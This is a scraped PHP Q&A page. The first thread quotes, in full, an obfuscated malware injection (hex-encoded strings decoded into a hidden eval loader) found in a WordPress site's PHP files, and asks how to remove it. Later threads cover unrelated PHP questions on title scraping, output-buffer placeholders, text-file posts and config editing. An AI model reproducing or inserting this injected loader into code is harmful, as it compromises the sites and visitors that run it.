Find and replace a string in multiple files in whole server - php

My server gets malware which was inserted a bunch of lines code in every php file now I want to remove that using a script. So initially I am trying to find and replace in a single file and later I will try for all the php files.
<?php
$oldMessage = "$udpyrtpnkn = \'6]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x786~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjmeplace(\"%x2f%50%x2e%52%x29%57%x65\",\"%x65%166%x61%154%x28%151%.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<-s.973:8297f:5297e:56-%x5c%x7878r.9<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z8b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x756<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257Upo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7MPT7-NBFSUT%x5c%x7860x5c%x7878<~!!%x5c%x7825s:N}#-%x5c825-*.%x5c%x7825)euhA)3of>2bd%x5c%x78825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x%x7825>%x5c%x782fh%x5c%x7825:<f!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%825tzw%x5c%x782f%x5c%x7824)#%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5cqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%%x785c2b%x5c%x7825!>!2p%x57]278]225]241]334]368]322]3]36<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7c%x7825tmw!>!#]y84]275]y83]273]y76x5c%x78272qj%x5c%x78256<^#zsfv7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5tRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#c73]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%5.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78768]y7f#<!%x5c%x7825tww!825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bgj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5cppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3}#)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hf27{**u%x5c%x7825-#jt0}Z;0]=]7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c]277#<%x5c%x7825t2w>#78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<]281]y43]78]y33]65]y31]55]y85]c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOx7825)!gj!|!*1?hmg%x5c$n){return chr(ord($n)-1);} #error_reporting(0); preg_r-id%x5c%x7825)uqpuft%xLDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbx5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%2f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y782]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%53]Kc]55Ld]55#*<%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUobz+sfwjidsb%x5c%x7860bj+upcotn+q.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{6%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x85:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y35c%x787f<*XAZASV<*w%%x5c%x7827,*c%x5c%x7827,*b%x5c%x7-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x7x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tu4%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x7825%x55c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1r#%x5c%x785cq%x5c%x78257%x5c%x782f7###7%x5c%x782f7^#iubq#%x%x5c%x7825fdy)##-!#~<%75L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]8#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72x7824<!%x5c%x7825o:!>!%xsvufs!|ftmf!~<**9.-j%x%x5c%x7825yy>#]D6]281L125rN}#QwTW%x5c%x7825hIr%x5c%x785c1^FH#%x5c%x7827rfs%x5c%x78256~85c}X%x5c%x7824<!%x5c%x7820#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x525!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782fpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2pssfw)%x5c%x7825c*W%xx5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f7825bG9}:}.}-}!#*<%x5c%x77825bss-%x5c%x7825r%x5c%x7878B%c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x78<jg!)%x5c%x7825z>>2*!%x5c%x782#%x5c%x782f#M5]DgP5]D6#<%x5c%x78]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]2x5c%x7825w:!>!%x5c%x78246767~6<Cw6<5)}.;%x5c%x7860UQPMSVD!bT-%x5c%x7825bT-%x5c%x7825hW~c%x7824*!|!%x5c%x7824-%x5c%xq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5cOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfe%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x78Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x76]258]y6g]273]y76]271]y7d]252]y7svmt+fmhpph#)zbssb!-#**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78bP#-#Q#-#B#-#T#-#E#-#G#-5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x782_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x7825pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x156%x75%156%x61\"]=1; function fjfgg(x74%141%x72%164\") && (!isset($GLOBALS[\"%x6125fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]25c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x64]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452860TW~%x5c%x7824<%x5c%x78e%x5c%x773\", NULL); }%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V7;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvb!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tus5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%xo]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x7821]K78:56985:6197g:74985-rr.93e:5597f76#<%x5c%x78e%x5c%x78b%FHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5825%x5c%x787f!<X>b%x5c%x7825Z<#o64]284]364]6]234]342]58]24]31#-%x5c%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5>!%x5c%x782400~:<h%x%x5c%x7827Y%x5c%x782564]256#<!%x5c%x7825ff2!>!b0%x28%42%x66%152%x66%147%x6x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]3x6d%160%x6c%157%x64%145%<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x786x5c%x7825h>#]y31]278]y3e]8]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x7x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6Rx7825=*h%x5c%x7825)m%x5cssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x58W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|824-%x5c%x7824y7%x5c%x7824-%x5c%x87fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!<***7860gvodujpo)##-!#~<#%x5c%x782f%x5c%5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmg#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787%42%x2c%163%x74%162%x5f%163%x70%15h%x5c%x7825)sutcvt)esp>hmg%x5c-%x5c%x7825r%x5c%x785c2^-qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%8]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%0msvd}R;*msv%x5c%x782x5c%x7825h>EzH,2W%x5c%x78255c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#7825mm!>!#]y81]273]yq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)g%156%x75%156%x61\"])))) { $GLOBALS[\"%x61%7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-buc%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnbE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x2#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5cj%x5c%x7825-bubE{h%x5c%x|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860x28%141%x72%162%x61%171%x5f%155%x61%165c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%xe]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9])!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%xj6<^#Y#%x5c%x785cq%x5c%x7825oj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%xf%x5c%x7827,*e%x5c%x7827,*d7f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[Ax5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c52]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y7d2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j5z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%xif((function_exists(\"%x6f%142%x5f%163%%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}65c%x785c%x5c%x7825j:^<!%x5c%x7825w%x%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftm%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x78247825#%x5c%x782f#o]#%xsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssuc%x7878:!>#]y3g]61]y3f]63]y3:]68]y]88]5]48]32M3]317]445]212]445]43]321]4%x5c%x7825)}k~~~<ftmbg!o787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)f%x7825)!gj!<**2-4-bubE{>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%xufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c7827)fepdof.)fepdof.%x5c%x782f###%x5c%x782fqp%x5c%x75tzw>!#]y76]277]y72]265]y39]274]y85]2x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x78255c%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x#%x5c%x782f#%x5c%x782wN;#-Ez-1H*WCw*[!%x5c%x78f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!6<%x5c%x787fw6*CW&)7gj6<827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f3tpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]5%x7827u%x5c%x7825)7fmji%x5c%x7878627;mnui}&;zepc}A;~!}%x5x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d/(.*)/epreg_replacebsupukrgnh'; $mrvphzdexz = explode(chr((205-161)),'8660,38,4858,43,7465,40,4822,36,2103,55,110,61,5905,24,7852,38,5828,27,6847,35,2874,70,8962,34,5476,23,3943,35,4777,45,5691,35,1721,47,171,55,2513,70,49,61,9608,24,9938,62,9820,34,5929,53,5395,45,373,39,3368,28,921,48,7810,42,507,21,2180,38,9632,38,1768,47,6937,62,1044,30,3009,59,9384,64,7404,61,8045,28,5781,22,4170,59,4709,68,2730,63,6564,62,9058,43,9727,45,2434,46,4128,42,6806,41,8150,58,8698,62,6173,46,6037,57,7151,21,3978,23,2158,22,4658,51,5243,47,9194,37,4229,63,9034,24,3288,22,6718,38,8073,50,7505,48,7596,58,7705,40,5982,55,1548,51,7745,24,1074,68,2081,22,9101,23,6882,30,5566,56,7553,43,3573,70,5134,49,866,26,7255,61,969,41,561,37,3534,39,6626,56,8123,27,2698,32,9231,52,6467,64,4387,49,4292,43,2480,33,4469,21,1815,43,8907,55,1212,49,8416,43,5726,35,2018,63,5499,67,5622,32,412,34,2218,42,4058,70,8796,46,686,48,3663,43,9502,21,9548,60,10051,55,10000,51,7769,41,7316,68,1652,69,9320,64,8004,41,5183,60,2583,41,2678,20,2260,63,6256,68,8250,66,762,56,4335,52,9854,23,3762,65,1858,28,3422,54,8886,21,6219,37,3396,26,9283,37,1261,66,9877,61,1010,34,1927,21,3889,54,1461,23,5761,20,1599,53,656,30,4490,54,4544,36,6756,50,6324,24,9772,48,8316,56,8595,65,7199,56,3264,24,7890,46,7384,20,4436,33,5803,25,6348,65,4030,28,1886,41,8842,44,5290,47,818,48,8208,42,1142,70,446,61,6531,33,8459,43,9124,70,6682,36,2793,37,3211,53,6120,53,2830,44,3643,20,5337,58,3476,58,1391,70,6413,54,7172,27,9523,25,3333,35,6912,25,3157,54,7654,51,3731,31,6094,26,5440,36,226,35,2624,54,7936,68,1948,40,3310,23,3857,32,4901,69,3090,67,2412,22,3706,25,1484,64,4001,29,3068,22,5855,50,892,29,5035,53,8996,38,5654,37,9670,57,1327,64,528,33,7067,47,7114,37,8560,35,598,58,4970,65,8760,36,2944,65,261,67,3827,30,8502,58,5088,33,328,45,734,28,4635,23,9448,54,4580,55,8372,44,0,49,2323,45,6999,68,1988,30,2368,44,5121,13'); $wtnsmruwng=substr($udpyrtpnkn,(48065-37959),(24-17)); if (!function_exists('rczvdpjblj')) { function rczvdpjblj($syascgyczg, $weichsdvue) { $lilckbfxmb = NULL; for($xoosaeyubj=0;$xoosaeyubj<(sizeof($syascgyczg)/2);$xoosaeyubj++) { $lilckbfxmb .= substr($weichsdvue, $syascgyczg[($xoosaeyubj*2)],$syascgyczg[($xoosaeyubj*2)+1]); } return $lilckbfxmb; };} $jmmhxfkfmg=\"\x20\57\x2a\40\x67\146\x6b\170\x62\156\x62\144\x6d\170\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\61\x31\55\x31\67\x34\51\x29\54\x20\143\x68\162\x28\50\x33\61\x33\55\x32\62\x31\51\x29\54\x20\162\x63\172\x76\144\x70\152\x62\154\x6a\50\x24\155\x72\166\x70\150\x7a\144\x65\170\x7a\54\x24\165\x64\160\x79\162\x74\160\x6e\153\x6e\51\x29\51\x3b\40\x2f\52\x20\153\x62\154\x6e\167\x7a\161\x71\147\x6b\40\x2a\57\x20\"; $yofbztmjsc=substr($udpyrtpnkn,(68058-57945),(58-46)); $yofbztmjsc($wtnsmruwng, $jmmhxfkfmg, NULL); $yofbztmjsc=$jmmhxfkfmg; $yofbztmjsc=(449-328); $udpyrtpnkn=$yofbztmjsc-1;";
$deletedFormat = "";
//read the entire string
$str=file_get_contents('wp-load.php');
//replace something in the file string - this is a VERY simple example
$str=str_replace("$oldMessage", "$deletedFormat", $str);
file_put_contents('wp-load.php', $str);
?>
But this was giving me error can any one give suggestions how to do this and remove this malware?

For wordpress malware there is a plugin available.
Wordfence is a plugin which will find malicious code in your whole wordpress site and removes it also.
May be this will help you and save you time.

Related

Get Webpage Title from URL in PHP not working

I'm trying to receive a certain url through post and scrape the title of that HTML page. Then, I will store the title of the page into my MySQL Database.
Before Implementing this feature to my actual online server, I tested the page_title function (which is the custom function that reads the title of the HTML page of a given URL) on my local server, and it worked fine. Here is the code I used on my local server.
<?php
$link = $_POST['link'];
function page_title($url) {
$fp = file_get_contents($url);
if (!$fp)
return null;
$res = preg_match("/<title>(.*)<\/title>/siU", $fp, $title_matches);
if (!$res)
return null;
// Clean up title: remove EOL's and excessive whitespace.
$title = preg_replace('/\s+/', ' ', $title_matches[1]);
$title = trim($title);
return $title;
}
$title= page_title($link);
echo $title; ?>
However, when I used this exact same code on my online server to actually push the data in to the MYSQL Database, the function seems to return nothing but an empty string. As a result, whenever I check my php myadmin, nothing appears on the "title" column. Can anyone please tell me what I can do to make this work? Thank you!
I suggest simplifying it by doing this (remove the comments as it is too much info):
<?PHP
# Get the HTML from a web page
$html = file_get_contents("http://whatever.url");
# Get all HTML titles in to an array (this is your own code)
$res = preg_match("/<title>(.*)<\/title>/siU", $html, $titleArray);
# Get the first array entry - and an empty string if the tag does not exists
$title = isset($titleArray[0]) ? $titleArray[0] : "";
# Remove HTML tags from the string
$title = strip_tags($title);
# Show the title - convert HTML tags just to show it does not have any
echo "[". htmlentities($title) ."]";
# Save it to your database ...
?>

PHP replace {replace_me} with <?php include ?> in output buffer

I have a file like this
**buffer.php**
ob_start();
<h1>Welcome</h1>
{replace_me_with_working_php_include}
<h2>I got a problem..</h2>
ob_end_flush();
Everything inside the buffer is dynamically made with data from the database.
And inserting php into the database is not an option.
The issue is, I got my output buffer and i want to replace '{replace}' with a working php include, which includes a file that also has some html/php.
So my actual question is: How do i replace a string with working php-code in a output-buffer?
I hope you can help, have used way to much time on this.
Best regards - user2453885
EDIT - 25/11/14
I know wordpress or joomla is using some similar functions, you can write {rate} in your post, and it replaces it with a rating system(some rate-plugin). This is the secret knowledge I desire.
You can use preg_replace_callback and let the callback include the file you want to include and return the output. Or you could replace the placeholders with textual includes, save that as a file and include that file (sort of compile the thing)
For simple text you could do explode (though it's probably not the most efficient for large blocks of text):
function StringSwap($text ="", $rootdir ="", $begin = "{", $end = "}") {
// Explode beginning
$go = explode($begin,$text);
// Loop through the array
if(is_array($go)) {
foreach($go as $value) {
// Split ends if available
$value = explode($end,$value);
// If there is an end, key 0 should be the replacement
if(count($value) > 1) {
// Check if the file exists based on your root
if(is_file($rootdir . $value[0])) {
// If it is a real file, mark it and remove it
$new[]['file'] = $rootdir . $value[0];
unset($value[0]);
}
// All others set as text
$new[]['txt'] = implode($value);
}
else
// If not an array, not a file, just assign as text
$new[]['txt'] = $value;
}
}
// Loop through new array and handle each block as text or include
foreach($new as $block) {
if(isset($block['txt'])) {
echo (is_array($block['txt']))? implode(" ",$block['txt']): $block['txt']." ";
}
elseif(isset($block['file'])) {
include_once($block['file']);
}
}
}
// To use, drop your text in here as a string
// You need to set a root directory so it can map properly
StringSwap($text);
I might be misunderstanding something here, but something simple like this might work?
<?php
# Main page (retrieved from the database or wherever into a variable - output buffer example shown)
ob_start();
<h1>Welcome</h1>
{replace_me_with_working_php_include}
<h2>I got a problem..</h2>
$main = ob_get_clean();
# Replacement
ob_start();
include 'whatever.php';
$replacement = ob_get_clean();
echo str_replace('{replace_me_with_working_php_include}', $replacement, $main);
You can also use a return statement from within an include file if you wish to remove the output buffer from that task too.
Good luck!
Ty all for some lovely input.
I will try and anwser my own question as clear as I can.
problem: I first thought that I wanted to implement a php-function or include inside a buffer. This however is not what I wanted, and is not intended.
Solution: Callback function with my desired content. By using the function preg_replace_callback(), I could find the text I wanted to replace in my buffer and then replace it with whatever the callback(function) would return.
The callback then included the necessary files/.classes and used the functions with written content in it.
Tell me if you did not understand, or want to elaborate/tell more about my solution.

Using text from a file to point to another file to read

Note: I'm sorry if the title was a little unclear couldn't think of another way to put it.
I am making a PHP posting system for a blog like website. I have a file called posts.txt which has information that points to other text files. These other text files have the physical post content in them. I know this is not the best way to do it but for now this is what I'm doing.
A sample of the posts.txt:
posts/topDownShooter.txt
posts/leapMotionSandbox.txt
end
The first two lines point to other text files that contain post content. The last line "end" lets the program know that all the post "pointers" are done
Here is a sample of a post like topDownShooter.txt
programming
Top Down Shooter
The actual post content goes here
end
The first line is a tag for organization. The second line is the title of the post. And the third is the actual content. The last line serves the same purpose.
Here is my PHP code:
I use "<--" for comments
<?php
$posts = "posts/posts.txt"; <--Pointer to the location of the posts.txt
$postsLines = file($posts);
$fetchingPost = TRUE; <--For while loop
$postNumber = 0;
$postPointer; <--In the example of posts.txt this would be the second or third line
$postTag;
$postTitle;
$postContent;
$endCondition = "end";
while ($fetchingPost == TRUE) {
$endOfFile = strcmp($postsLines[$postNumber], $endCondition);
if ($endOfFile == 0) {
$fetchingPost = FALSE;
}
if ($endOfFile <> 0) {
$postPointer[$postNumber] = $postsLines[$postNumber];
$postTag[$postNumber] = file($postPointer[$postNumber]); <--The problem, see below
$postNumber = $postNumber + 1;
}
}
?>
The Problem: It will not let me use a line that I take out of posts.txt as a "pointer" for accessing topDownShooter.txt or anything like that. I thought that the value I was pulling out of posts.txt was a string but it is not. Is there anyway that I can convert this to a string or make it work?
EDIT:
in short:
is there anyway to take something from $postsLines = file("somerandomtxtfile.txt); and make %postsLines[0] a string?
I'm not sure if I understand your question, but I'd try replacing the line by this
$postTag[$postNumber] = file_get_contents($postPointer[$postNumber]);
Answering the question in your edit, you can do that like this:
$postLines = explode(PHP_EOL, file_get_contents("somerandomtxtfile.txt"));

preg_replace is only executed at the first time

I'm trying to edit a config file using a html form. The edit (settings.php) file looks like this:
$config['foo'] = FALSE;
$config['maintenance'] = FALSE; //this line is that what it matters
$config['bar'] = FALSE;
The idea here is change the of $config['maintenance'], so once the form is submitted (there is a checkbox named maintenance in order to set the status to true or false according to its state), I get the checkbox value as:
$status = ($_POST['maintenance'] === 'on')? "TRUE" : "FALSE";
I have debugged $status var value and everything goes fine to here. Now, I am using the regex below to find the correct line at file:
\$config\[(\s+)?(\'|")maintenance(\'|")(\s+)?\](\s+)?=(\s+)?(false|FALSE|true|TRUE);/
Initially "works" good, because I am not sure, but let me finish the explanation...
According with the code above, now I proceed to do the replacement:
//read the content and replace it
$content = preg_replace(
'/\$config\[(\s+)?(\'|")maintenance(\'|")(\s+)?\](\s+)?=(\s+)?(false|FALSE|true|TRUE);/',
'$config["maintenance"] = ' . $status . ';',
file_get_contents($file)
);
//set the new content
file_put_contents($file, $content);
When I run it the first time with the checkbox checked it works and the result is as follow:
$config['foo'] = FALSE;
$config["maintenance"] = TRUE;
$config['bar'] = FALSE;
However, no matter what I select in the checkbox, the file does not show any changes. Can you guide me to the right direction to find the bug? Thank you
Edit.
This is the html markup
<label>
<input type="checkbox" name="maintenance" /> in maintenance mode
</label>
Try this:
$status = (isset($_POST['maintenance'])) ? 'TRUE' : 'FALSE';
and:
$content = preg_replace(
'/\$config\[\s*[\'"]maintenance[\'"]\s*\]\s*=\s*(false|true);/i',
'$config["maintenance"] = ' . $status . ';',
file_get_contents($file)
);
However the code you posted works fine for me, you should do more debugging like:
error_reporting(-1);
or checking $content before and after replace. Check your error logs (or search for error message if you have display_errors set to on). There can be anything wrong. (e.g. file permissions).
Also consider:
full rewriting of config file instead of just replacing one line - it might be prone to errors.
acquiring locks while writing/read to/from the file

PHP Wordpress gallery not finding the XMLl file

The code is below - it uses a wordpress shortcode which is [my_hmg=widget.xml] but if you try change the xml file like this [my_hmg=example_gallery.xml] it just always reverts to the default widget.xml
The problem is in the function my_hmg_filter_Callback in particular these 2 lines;
#$my_hmg_file = #$output['filename'];
if($my_hmg_file==""){$my_hmg_file = "widget.xml";}
For some reason it always thinks the file name is blank so always reverts to widget.xml.
The files can be downloaded from here - http://www.gopiplus.com/work/2010/07/18/horizontal-motion-gallery/
function my_hmg_show_filter($content){
return preg_replace_callback('/\[my_hmg=(.*?)\]/sim','my_hmg_filter_Callback',$content);
}
function my_hmg_filter_Callback($matches)
{
$my_hmg_package = "";
$var = $matches[1];
parse_str($var, $output);
#$my_hmg_file = #$output['filename'];
if($my_hmg_file==""){$my_hmg_file = "widget.xml";
}
Firstly change the short code to [my_hmg file='file.xml']
Then if you have a quick read of Wordpress's short code API you'll see that the first argument in the callback function are the attributes of the short code.
This way you can the reference the attribute 'file' in the array and get the proper url.

Categories